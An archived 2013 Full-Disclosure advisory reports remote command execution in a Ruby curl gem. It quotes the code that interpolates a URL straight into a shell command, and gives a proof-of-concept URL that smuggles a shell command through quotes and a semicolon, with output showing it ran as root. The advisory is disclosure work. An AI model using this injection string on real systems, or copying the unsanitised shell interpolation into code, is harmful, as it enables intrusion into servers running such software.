lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-id: <24e95bc7-afe1-4ddb-812a-78111ac8ecf7@me.com>
Date: Tue, 12 Mar 2013 23:07:48 +0000 (GMT)
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Subject: Curl Ruby Gem Remote command execution
Curl Ruby Gem Remote command execution
3/12/2013
https://github.com/tg0/curl
Specially crafted URLs can result in remote code execution:
In ./lib/curl.rb the following lines:
131 cmd = "curl #{cookies_store} #{browser_type} #{@...up_params} {ref} \"{url}\" "
132 if @debug
133 puts cmd.red
134 end
135 result = open_pipe(cmd)
PoC:
page = curl.get("http://vapid.dhs.org/\"\;id\/tmp\/p\;\"")
larry@...erfl0w:/tmp$ cat p
uid=0(root) gid=0(root) groups=0(root)
Larry W. Cashdollar
@_larry0
http://vapid.dhs.org
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/